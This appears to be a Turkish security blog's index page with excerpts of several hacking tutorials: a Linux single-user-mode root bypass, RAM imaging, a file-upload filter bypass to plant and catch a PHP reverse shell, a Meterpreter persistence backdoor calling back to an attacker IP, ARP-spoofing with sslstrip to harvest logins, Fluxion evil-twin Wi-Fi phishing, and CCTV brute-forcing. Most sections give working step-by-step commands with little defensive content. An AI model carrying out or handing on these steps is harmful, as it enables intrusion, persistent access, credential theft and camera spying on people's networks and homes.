13 Nisan 2017 Perşembe

Linux Sistemlerde Single User Mode Zafiyeti

Merhaba arkadaşlar bu makalemizde sizlere parolası unutulmuş Linux kullanıcıları için  sistem zafiyeti olarak görülmeyen ama önlemini alınmadığı takdirde çok büyük bir zafiyet içeren single user mode’dan bahsediyor olacağız. Single user mode Linux kullanıcıların parolalarını unutması durumda konsol dan sisteme erişerek şifreyi değiştirmek maksadıyla acık bırakılmış bir moddur.


Makinemizi reboot ettikten sonra  açılış sırasında her hangi bir tuşa basarak grup önyükleyici bölümüne giriş yapılır. Grup önyükleyici kısmana geçtiğinizde yukardaki ekran gibi bir ekranla karşılaşacaksınız. E ye basarak boot ekranına giriş yapalım.Boot ekranına giriş yaptığınızda aşağıdaki ekrandaki gibi bir ekranla karşılaşacaksınız.


Karşımıza gelen ekranda kernel’e gelip E’ye basarak düzenleme bölümüne girelim. Düzenleme bölümüne giriş yaptığınız taktirde aşağıdaki ekranla karşılaşacaksınız.


Karşımıza gelen ekranda quiet yazısını silip hangi mod’da  açılmasını istiyorsak onu yazıyoruz. Aşağıdaki resimde görüldüğü gibi single yazıp ctrl+x kombinasyonuna basarak sistemi yeniden başlatıyoruz.


Sistemi yeniden başladıktan sonra sistem kendini single mode de açarak bize direk root yetkisi verecektir. Ben kendime yukarda resimde gözüktüğü gibi rooot adında root yetkilerine sahip bir kullanıcı oluşturuldum. Gerekli önlemler alınmadığı takdirde bundan sonrası sisteminize erişen kişinin hayal gücüne kalmıştır.



Devamı

Bellek Üzerinden İmaj Alımı

Adli bilişim incelemelerinden bellek imajı alma adımları aşağıdaki gibidir.
Ram'dan imaj alımında DUMPIT adlı yazılımı kullanılacaktır. DUMPIT RAM üzerinden imaj alımı için ideal yazılımlardan birisidir.
İndirme Linki: http://www.moonsols.com/wp-content/plugins/download-monitor/download.php?id=7

İlk olarak indirilmiş olan klasörün içerisine girilir ve “DumpIt.exe” çalıştırılır.
Command promt ekranı bizden onay beklemektedir, herhangi bir parametere girmeden "Y" diyerek ramdan imaj alım işlemi başlatılır, "Success" mesajı alındıgı zaman imaj işlemi tamamlanmış anlamına gelmektedir.
Görüldüğü gibi bellek imajı isim.raw şeklinde alınmıştır.


Devamı

Upload Bypass & Reverse Shell Alma

Ele geçirilen bir web uygulaması sayesinde, server'dan bağlantı almak için sunucuya dosya yüklemek gerekmektedir. Bunun için bazı güvenlik önlemlerini aşmak gerekmektedir.

Görüldüğü üzeri ekranda bir upload sayfası bulunmakta, buraya .php uzantılı dosya yüklenmek istenildiğinde dönen cevapda bu dosya uzantısının yüklemek için uygun olmadıgını söyleyen bir mesaj çıkıyor.
Terminal satırı açılır ve  “cp /usr/share/webshells/php/php-reverse-shell.php /root/Documents” şeklinde shell dosyasını documents klasörüne atılır (başka bir klasörede aktarılabilir.) documents klasörüne girilir ve nano komutu ile php-reverse-shell.php dosyası açılır. $ip “kısmına local ip adresi yazılır” ve $port “kısmına local port yazılır”, bilgiler güncellenip kayıt edildikten sonra .php uzantısından sonra .jpg eklenir.

Konsola burpsuite yazılarak burp çalıştırılır ve “Proxy” kısmından “Intercept” sekmesinden “Intercept is on” butonuna tıklayarak dinlemeye alınır. “bu adımdan önce browser üzerinden proxy ayarı değiştirilmelidir.”

Son olarak upload bölümünden shell dosyası seçilir ve burp üzerinden .jpg uzantısını kaldırılır “Forward” butonuna tıklanır. Görüldüğü gibi başarılı bir şekilde .php yüklenmiştir mesajını alındı.


Son olarak dosyanın yüklendiği dizinine girilir ve görüldüğü gibi .php şeklinde yüklenmiş.

Son olarak konsol üzerinden “nc -lvp *dinleme yapılacak port* ” yazılır ve php-reverse-shell.php dosyayına tıklanılır, ve bağlantının geldiği görüntülenir.

Devamı

Gizli Kablosuz Ağların Tespiti



Bazı kablosuz ağların SSID’leri güvenlik amacı ile sistem yöneticileri tarafından gizlenmektedir. Yapılma nedeni ise dışarıdan gelen bir kullanıcının kablosuz ağı görmesini engellemesi veya x bir kişi attack yapmasını engellemek içindir. Genel olarak şirketler, holdingler, ve benzeri kurumlar tarafından kullanılmaktadır.


İlk olarak kablosuz ağ kartı aktif edilir, bir sonraki adımda ise "airodump -ng mon0" şeklinde ağ keşfi yapılır. " <length:  0> " şeklinde olan gizli bir kablosuz ağ görünülüyor.

<airodump-ng -c> (kanal numarası belirtilir) <--bssid> (hedef routerin BSSID'si) <mon0> (aktif edilen ağ kartı belirtilir) ve "ESSID" kısmında gizlenmiş olan ağın ismi görüntülenmektedir.


Devamı

Windows - Backdoor (Arka Kapı) Yerleştirme

Windows işletim sistemleri ele geçirildikten sonra sisteme tekrardan bağlantı gerçekleştirmek için backdoor yerleştirilmesi gerekmektedir. Peki metasploit üzerinden meterperer satırındayken nasıl backdoor yerleştirme işlemi gerçekleştirilir ?

Aşağıda örnek bir rat oluşturulmuştur, belirtilen port dinlemeye alınarak hedef sistemden reverse shell alınmıştır.

Gelen bağlantı ile meterpreter satırına düşüldükten sonra “backround” komutunu kullanılarak gelen bağlantı arka plana alınır, “sessions” komutu ile “ID” numarasını öğrenilir. Son olarak "sessions -i <ID> ” şeklinde bağlantı yapılır. Meterpreter satırındayken ufak bir script çalıştırlır “run persistence -U<kullanıcı tespiti>  i 5<bağlantı saniyesi> -p  <saldırgan port> -r <saldırgan ip>” şeklinde yazılırarak çalıştırılır.

Gerekli bütün adımlar görüldüğü üzeri sıkıntısız bir şekilde gerçekleşmiş. Test etmek için hedef sistem shutdown veya restart edilir.

sessions komutu çalıştırdıgımız zaman görüldüğü gibi hiçbir bağlantı yok. Hedef sistem yeniden açıldıktan sonra “run” komutunu kullanarak sisteme tekrardan giriş sağlanır.


Devamı

Yerel Ağda MITM Saldırısı


Yerel Ağ saldırıları günümüzde en çok kullanılan hacking yöntemlerinden birisidir. İşyerlerinde, okullarda, kafelerde, halka açık yerlerde, kısacası internetin ağının oldugu her yerde bu tarz saldırılarla karşılaşma olasılığı maalesef çok yüksektir. Kullanıcıların ağa bağlı iken yaptıkları bütün işlemler kötü niyetli bir hacker (Blackhat) tarafından izlenilebilir ve yönetilebilir. Telefonunuz, bilgisayarınız, tabletiniz, kısacası internete  bağlantısı olan bütün cihazlar bu tarz saldırılara maruz kalabilir.

Arpspoofing saldırısı yerel ağlarda en çok kullanılan yöntemlerden biridir. Saldırganın yapmış oldugu yöntem, hedefin Arp tablosunu üzerine alarak bütün trafiğini dinlemesidir. Peki sslstrip nedir?  Saldırgan hedefin IP'nin trafiğini dinlemeye başlaması ile birlikte SSL sertifikası kullan sitelerde girilen, kullanıcı adı, parolalara, vb bilgileri göremez, nedeni ise paketlerin şifrelenerek gönderilmesidir. Sslstrip’in amacı ise ssl sertifikası kullanan kullanan siteleri normal http protokolüne çevirmesidir ve paketlerin içeriğini okumasına yardımcı olmaktır. 

Terminal satır açılır ve " echo “1” > /proc/sys/net/ipv4/ip_forward " yazılarak IP yönlendirmesi yapılır.
“1” Değeri yönlendirmenin açık olacagı anlamına gelir.
“0” İse kapalı oldugu anlamına gelir.

iptables -t nat -A PREROUTING –i eth0 -p tcp --destination-port 80 -j REDIRECT --to-port <8080>  Http trafiğini sslstriptin dinleme yapmış olduğu porta yönlendirilmesi gerekir.
Parametre
Açıklama
Iptables
Linux üzerinde gelen firewall
-t nat
Nat olarak belirliyoruz.
-A PREROUTING
Yönlendirme oldugunu belirliyoruz.
-i eth0
Ağ kartımızı seçiyoruz.
-p tcp
Protokolü belirliyoruz
--destination-port 80
Yönlendirelecek (hedef) portu belirtiyoruz.
-j REDIRECT --to-port
Yönlenecek portu belirliyoruz. Artık 80 portundan gelen bütün paketeler 8080 portundan geçecek.

arpspoof -i eth0 -t <Hedef ip> <Router ip> Hedef  IP üzerinden Router'a arp isteği yapılır. 

Son olarak " sslstrip -l 8080 " yazılarak SSLSTRIP  çalıştırılır. 
Komut
Açıklama
Sslstrip
Araç belirlenir.
-l 8080
8080 portunu dinlemeye alması gerektiği belirtildi.

Hedef sistem SSL bağlantıyla gitmesi gerektiği sayfaya http protokolü ile gittiği görülüyor.

Son olarak log dosyasından bilgiler elde edilir " cat isim.log". Log kayıtlarının incelenmesi sonucunda, email=deneme@gmail.com hedefin girmiş olduğu email adresi, hemen yanında bulunan pass=hack123456 ise hedefin girmiş oldugu şifredir.

Devamı

Fluxion Saldırısıyla WI-FI Hacking

WPA2 şifresi kırmak için zamanınız yoksa ya da bu durum sizin için olağan dışı derecede güçse, biraz sonra anlatacaklarımız bunun için çözüm niteliğinde olabilir. Nasıl mı? Şans eseri, hemen hemen tüm sistemlerin, kullanıcıların güvenebileceği genel bir güvenlik açığı var!

Sosyal mühendislik, donanımın ötesine geçerek herhangi bir sistemin en savunmasız kısmına saldırabilirsiniz. Şimdi ise sizi, bu işlemi sizin için çok daha kolaylaştıracak bir araçla tanıştıracağım. Fluxion!

Fluxion, aircrack-ng, mdk3, hostapd vb. araçları bünyesinde barındıran ve sizler için kullanımını daha basit bir ekran üzerinden bir bütün olarak sunan bir araçtır.  Fluxion, WPA / WPA2 şifrelerini yakalamak için MITM yöntemini kullanır ve WPA/WPA2 parolalarını yakalamak için sahte bir erişim noktası oluşturma sürecini otomatikleştirir. Öyleyse av başlasın!


En Zayıf Halkayı Seçin

Kullanıcılar neredeyse her zaman bir sistemin en zayıf halkasıdır ve bu nedenle ucuz ve etkili olduğu için her zaman ilk olarak hedefte onlar bulunurlar. Kullanıcılar bir sosyal mühendislik saldırısına karşı teknolojiden yeterince tecrübeli değillerse, donanım endişeleri de bir o kadar yok sayılabilir. Bu durumdan kaynaklı bir çok atak vektöründe de kimlik avı ve taklit saldırıları hackerlar için ilk tercihler arasındadır. Bu tür saldırılara karşı en savunmasız hedeflerden biri, teknoloji dışındaki bir endüstriye odaklanmış küçük veya orta ölçekli bir işletmedir. Bu tip işletmeler genellikle kablosuz ağları üzerinden kolaylıkla yararlanılabilen ve bir saldırının neye benzediğini bilmeleri mümkün olmayan, varsayılan kimlik bilgilerine sahip bir çok güvenlik açığı bulunan veya düzeltilmemiş olan sistemlere sahiptir. 

Fluxion...

Fluxion bir kullanıcıyı ait WI-FI parolasına, bir kaç klavye dokunuşuyla ulaşabileceğiniz teknik ve sosyal mühendislik otomasyonunun bir karışımıdır.  Fake AP, entegre jamming ve handshake yakalama işlevlerini kullanarak donanımları görmezden gelmek ve "WETWARE" alanına odaklanmak için kullanılan bir otomatize edilmiş sosyal mühendislik aracıdır. Wifiphisher gibi araçlar benzer saldırıları gerçekleştirebilse de, sağlanan WPA şifrelerini doğrulama yeteneğinden yoksundur. 

Fluxion genel görünüm

Kurulum...

  • Fluxion'ı linkteki adresten bilgisayarımızı indiriyoruz.
  • İndirme işlemi tamamlandığında dosyayı arşivden fluxion klasörü içerisine çıkartıp, cd fluxion komutu ile birlikte dizine girdikten sonra sudo ./fluxion komutunu kullanarak aracı çalıştırıyoruz. (Kurulması gereken bazı bağımlılıklar varsa, önce bunları yükleyin ve ardından devam ediniz.)









Muhtemelen bu adımdan sonra bazı bağımlılıkların gerekli olduğu bilgisini aşağıda göreceksiniz. Bağımlılıkları yüklemek için yükleyiciyi çalıştırın ve kurulumunuza devam edin.

  • sudo ./installer.sh

Kayıp paketleri yüklemek için bir pencere açılacaktır. Sabırlı olun ve bağımlılıkların yüklenmesi için bekleyin. Bütün bağımlılıklar yüklendikten sonra, işlemlere devam edebilirsiniz. Bunun için fluxion komutunu;

  • sudo ./fluxion ile tekrar çalıştırın.
Bu adımdan sonra ki ilk seçenek dili seçmektir. Dilin yanında ki rakamı yazarak seçin ve hedef tanımlama aşamasına geçmek için enter tuşuna basın. Ardından, saldırmak istediğiniz ağın kanalını biliyorsanız, taramayı istediğiniz kanala daraltmak için 2'yi seçebilirsiniz. Aksi taktirde, tüm kanalları taramak ve taramanın kablosuz verileri en az 30 saniye toplamasına izin vermek için 1'i seçin.


 Bu gerçekleştikten sonra bir pencere açılacaktır. İstediğiniz kablosuz ağa her eriştiğinizde yakalama işlemini durdurmak için CTRL + C tuşlarına basabilirsiniz. Bir istemcinin ağa bağlı olup olmadığının sağlıklı anlaşılabilmesi için saldırının en az 30 saniye çalışmasına izin verilmesi önemlidir. 

Çalıştırılacak saldırının aktif istemcilerinin bulunduğu numarayı yanındaki rakamı girerek seçin. Bir istemciyi beklemeyi düşünmüyorsanız, bu saldırı herhangi bir istemci olmadan bir ağ üzerinde çalışmaz. Herkes ağa bağlı olmadan bize şifreyi kim verecek değil mi?



Hedef ağın numarasını girdikten sonra, saldırı seçicisine ağ profilini yüklemek için enter tuşuna basın. Sonra ki adımda bir Fake AP yaratmak için 1'i seçip enter'a basacağız. Bu hedef erişim noktasını kopyalamak için yakalanmış bilgileri kullanarak sahte bir AP oluşturacaktır.


Aldığımız şifrenin çalıştığını doğrulamak için ele geçirilen bir handshake'i kontrol edeceğiz. Handshake'imiz varsa, bir sonraki ekranda girebiliriz, yoksa ağı bir sonraki adımda bir handshake almaya zorlamak için enter tuşuna basabiliriz.

Aircrack-ng yöntemini seçenek 1 seçildiğinde kullanan Fluxion, istemci olarak hedef AP'ye deauthentication paktleri gönderecek ve ortaya çıkan WPA handshake'ini dinleyecektir. Handshake'i açılan ekranın sağ üst köşesinde gördüğünüzde, handshake'i yakaladınız demektir. Sonrasında 1 yazın (Check Handshake) ve saldırıya devam edin.

 
Sosyal mühendislik aracını kullanmak için 1. seçenek Web Interface'i seçin.



Size kullanıcıya gösterebileceğiniz farklı sahne oturum açma sayfalarının bulunduğu bir menü sunulacak. Bunlar bazı işlerle özelleştirilebilir, ancak cihaz ve  dili ile eşleşmelidir. Varsayılanlar, kullanmadan önce test edilmelidir, çünkü bazıları çok inandırıcı değillerdir.


Bu ekrandan Fake AP'mizin arayüzünüde belirledikten sonra saldırı yapılan kablosuz ağın bir klonu oluşturulur ve kullanıcıyı aynı adlı ancak şifrelenmemiş ağa katılmaya ikna edebiliriz. Kullanıcı bu ağa bağlanmayı deneyerek parolasını girdiğinde, sahte erişim noktasından doğru parolayı girdiğine dair bir bildirim alarak internetine bağlanabilir. Bu adımlar sırasında bizde kullanıcının biraz önce girdiği parolaya dinleme yaptığımız Fluxion ekranı üzerinden ulaşabiliriz.
Devamı

CCTV Kamera Hacking ve Güvenlik



Günümüzde yaygın olarak kullanılan CCTV güvelik sistemleri kullanılmaya başlandığı tarihten bugüne kadar teknoloji ile birlikte ivmelenerek  bugün kullandığımız haliyle internet ortamından ulaşılabilir ve kontrol edilebilir hale geldi. Bir ip adresi üzerinden hizmet veren bu tip cihazlar, ip kamerası olarak da adlandırılmakta. Bu kavramlardan biraz bahsetmek gerekirse;
       CCTV, kameralar aracılığıyla alınan görüntünün belirli bir konuma iletildiği sisteme verilen isimdir. CCTV’nin açılımı, “Kapalı Devre Televizyon” anlamına gelen “Close Circuit Television”dur.
       IP Kamera ise gerekli noktaların güvenliği gibi farklı amaçlarla uzaktan izlemek ve kayıt altına almak için internet veya network bağlantınızdan faydalanarak gerek kablolu gerek kablosuz olarak kullanılabilmeye imkan sunan kamera teknolojisidir.
       NVR’lar ip kameralar için geliştirilen kayıt seçeneğidir.  Günümüzde NVR’ın yaptığı görevi yerine getirebilen DVR’lar da bulunuyor ancak ip kameralar düşünülerek hazırlanan NVR cihazlar bir çok farklı spesifik özellik sunuyor. Ayrıca NVR cihazlar eviniz veya iş yerinizde kameralarla sağlamak istediğiniz güvenliğin kaydını tutar. Herhangi bir tarihe dönmek istediğinizde, belirttiğiniz süre boyunca yapılan kayıtları izleme imkanınız olur.
Bugünlerde gündemden düşmeyen IoT cihazlarda ki güvenlik zafiyetleri gibi konuların yanı sıra aslında internete bağlantısı olan tüm cihazların ortak sorunu olan güvenlik, kamera sistemleri içinde tehlike arz ediyor. İş yerlerimizden kişisel hayatımıza hatta yatak odalarımıza kadar güvenliğimiz için soktuğumuz bu cihazlar, sizce o kadar da güvenli mi?
                Güvenlik kameralarımızdan gelen verileri kayıt etmek için paket sistem dahilinde satılan yada ayrı olarakta satın alabileceğimiz DVR ve NVR gibi kayıt cihazları görevleri dahilinde bulunan kayıt alma, geri oynatma gibi işlemleri yapabilmek için sizin de tahmin edebileceğiniz gibi bir yazılıma yani işletim sistemine ihtiyaç duyuyor. Bu gibi cihazların yazılımını sağlayan 4 büyük firma olduğu gibi istendiği taktirde marka sahibi şirketler açık kaynak olarak sunulan bu yazılımları kendilerine göre uyarlayarak kendi kayıt cihazlarıyla birlikte piyasaya sürebiliyor.
Çok basit bir yapıya sahip olmakla kalmayan bu işletim sistemleri hakkında ne yazık ki güvenlik namına da çok fazla bir önlem alınmış değil. Her yazılım firmasının kendi ile özleşmiş spesifik port numaraları ve tersine mühendislik ile rahatça ulaşabilen default login bilgileri içerdiğini de unutmamak gerekiyor. Bu portların Xmye’de 34567, Topsview’de 34600, NVSIP’de 9101 ve N_EYE’de ise 5000 olduğu bilinmekte. Kameralar ve kayıt cihazları üzerinde yapılmak istenen işlemler için alt yapıyı sağlayan Component object model modüllerinden ocx kütüphanesinin de 1993 yılında yazıldığını ve ne yazık ki günümüze kadar gelmesine rağmen güvenlik anlamında ilerleme göstermedi. Peki bu kadarla ile bitti mi? Tabi ki de hayır. Son kullanıcılar yani evlerinde, iş yerlerinde kendi güvenliklerini önemseyerek bu tip cihazlardan medet uman bizler cihazlarımızı uzaktan izlemek istediğimiz zamanalar da kullandığımız login bilgilerinin çok zayıf ve kolayca tahmin edilebilir olduğunun farkında değiliz. Kullanıcılardan ziyade bu durumda cihazı kullanıcıya ulaştıran toptancı ve satıcıların bu gibi durumlar ile ilgili son kullanıcıyı bilgilendirmemesi, son kullanıcı tarafında ise buna dikkat edilmiyor olması da özel hayatın gizliliğinin ihlal edilmesi için kötü niyetli kullanıcılara zemin hazırlıyor. Kullanıcıların %70’i admin kullanıcı adını kullanırken, 1234, boşluk ve admin ise en çok kullanılan parola durumunda.
Hollywood’da bir dönem büyük skallara neden olan CCTV hacking, günümüzde güvenlik amaçlı kullanılan bu cihazlarında  artması ile birlikte kötü niyetli kullanıcılar sadece yukarıda saydığımız yöntemler ile değil aksine daha farklı yöntemler geliştirmeye başladı. Brute-force, sql injection gibi uygulama katmanında da zafiyetler bulundurabilen 6 büyük firma uzun zamandır yapılan baskılara rağmen bir önlem almadı. Yakın tarihte ve bugünlerde adından sıkça bahsedilen MIRAI botnet içeriğinde de yine yukarıda bahsettiğimiz zafiyetlerden kaynaklı ele geçirelen cihazlar büyük trafik oluştururak Avrupa genelinde internet kesintilerine neden oldu.
                Nmap, netcad gibi yazılımlar ile birlikte yukarıda belirtiğimiz spesifik portlara tarama yapıldığı taktirde ağda yada ip üzerinde hizmet veren bir kamera sistemi olup olmadığı konusunda bilgi toplayabiliriz. 


Nmap taraması


Tarama işlemi sonrası elimizde olan dataya ocx kütüphanesi ile bir bruteforce işlemi başlatıyoruz. İşlem başladıktan sonra kendisine önceden belirlediğimiz wordlistler yardımı ile deneme yanılma yöntemiyle kontrol ettikten sonra true değer döndüren cihazları sisteme kayıt ederek bir sonra ki adıma geçiyoruz. Yataklarımıza kadar soktuğumuz bu cihazlar üzerinden birinin bizim özel hayatımıza suç niteliğinde ortak olması göz ardı edilemez bir durum. 
Kamera üzerinde uzaktan kontrolü sağlayan çeşitli fonksiyonlardan biri


Yukarıda örneğini gördüğümüz script uzaktan kontrolünü sağladığımız ip kamera sistemlerinin aslında özel hayatımızı ne kadar kolay ihlal edebileceğinin bir kanıtı gibi. Bu kod parçacığı ile cihaz çeşitli yöntemlerle kontrolünü ele geçirdiğimiz kayıt cihazı üzerinden kayıtları oynatmamıza yarıyor. Cihaza ulaşan kötü niyetli kullanıcılar  sadece bununla sınırlı kalmayarak aşağıda açıklamaları ile yer alan bir çok işlemi kolaylık yapabiliyor. Bunlardan kısaca bahsetmek gerekirse;

Örnek fonksiyon
Bu kod parçacığı tetiklendiği taktirde ise eski kayıtlara ulaşılabilmesine, bu kayıtların download edilebilmesine ve sistem üzerinden indirmeden izlenebilmesine olanak sağlıyor. 


Mevcut fonksiyonlar


PTZ kontrolü, lokasyon bilgileri gibi işlemlerin yanı sıra bir çok işlem ocx kütüphanesi ile birlikte gelen fonksiyonlar ile kontrol edilebilir hale geliyor. Kullanıcılar evlerine taktırdıkları kameraların güvenliklerini sağladığını düşünse de aslında durum görüldüğü gibi hiçte böyle değil. Bugün Türkiye’de sadece 1 günlük kısa bir taramayla 1000’e yakın ev ve iş yeri kamerası bu yöntemler ile izlenebiliyor, kayıt edilebiliyor ve istendiği taktirde cihaz üzerinde kayıtlı bulunan veriler silinebiliyor. Üzerine bir çok senaryo yazabileceğimiz bu güvenlik açığı sayesinde özel hayatımızın güvenliği için tedarik ettiğimiz bu cihazlar tam aksine bizi tehdit ediyor. 


Yukarıda AR-GE amaçlı yürütülen bir proje kapsamında yazılmış bir program görüyoruz. Bu program üzerinden dünya çapında yüz binlerce ip kamerayı izleyebilir, eski kayıtlara ulaşabilir, bu kayıtları silebilir, ip adresiniz baz alınarak çevrenizde ki kameralara ulaşabilir, kamera kanalları arasında gezebilir, izlediğiniz kameranın ip adresi üzerinden lokasyon bilgisine ulaşabilirsiniz. 
Devamı

Akıllı TV'lerin Yüzde 85'i Yayın Sinyalleri ile Hacklenebiliyor


IoT kavramının gelişmesiyle birlikte internete bağlanan cihazların sayısında büyük bir artış yaşanmaya başlandı. Cihaz sayısındaki bu artış için olumlu bir gelişme denilebilir ancak güvenlik tarafında ise aynı şeyi söylemek mümkün değil. Zira bu cihazlarda gerekli güvenlik önlemleri alınmadığından, her biri birer canlı bomba gibi internette geziniyor.

Devamı